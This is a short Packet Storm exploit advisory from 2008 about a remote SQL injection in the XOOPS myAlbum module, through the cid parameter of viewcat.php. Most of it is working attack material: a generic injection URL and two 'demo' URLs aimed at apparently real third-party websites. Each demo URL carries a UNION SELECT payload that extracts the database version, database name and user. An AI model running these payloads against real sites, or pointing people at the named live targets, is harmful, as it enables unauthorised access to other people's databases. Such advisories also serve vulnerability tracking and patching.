xhresim-sql.txt

2008-10-14T00:00:00
ID PACKETSTORM:70897
Type packetstorm
Reporter r45c4l
Modified 2008-10-14T00:00:00

Description

                                        
                                            `[~] XOOPS 1.0 RC 3.0.4 Module myAlbum - Remote SQL Injection  
[~]  
[~] www.xoops.org  
[~] ----------------------------------------------------------  
[~] Bug founded by d3v1l  
[~]  
[~] Date: 20.09.2007  
[~]  
[~]  
[~] d3v1l@spoofer.com  
[~]  
[~] -----------------------------------------------------------  
[~] Greetz tO:-  
[~]  
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )  
[~]  
[~]  
[~]-------------------------------------------------------------  
[~] Exploit :-  
[~]  
[~] http://site.com/modules/myalbum/viewcat.php?cid=SQL  
[~]  
[~] Demo :-  
[~]  
[~]  
[~] http://amigaworld.net/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/*  
[~] http://www.canelupocecoslovacco.info/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/*  
[~]----------------------------------------------------------------------------------------------------------------------  
`